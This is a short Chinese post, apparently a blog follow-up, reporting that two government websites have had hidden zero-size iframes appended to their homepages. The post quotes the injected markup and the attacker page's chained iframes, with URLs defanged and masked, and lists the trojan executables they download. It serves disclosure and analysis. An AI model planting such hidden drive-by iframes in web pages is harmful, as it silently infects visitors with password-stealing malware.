今天又看了看 两个会自动下载恶意程序文件的政府网站 一文中的两个网站,发现换了花样。
两个网站首页末均被加入:
/--------- <iframe src="hxxp://www.wzx***qy.com/" width="0" height="0" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no"></iframe> ---------/
hxxp://www.wzx***qy.com/ 的代码为:
/--------- <script language="javascript" src="hxxp://count1***0.51yes.com/click.aspx?id=106674545&logo=8"></script> <iframe src=hxxp://www.wzx***qy.com/2**/index.htm width=0 height=0></iframe> <iframe src=hxxp://www.wzx***qy.com/1**/index.htm width=0 height=0></iframe> <iframe src=hxxp://www.wzx***qy.com/3**/index.htm width=0 height=0></iframe> ---------/
分别下载恶意文件:
qq.exezhengtu.exe(Kaspersky 报为 Trojan-PSW.Win32.Delf.ob)
jianghu.exe
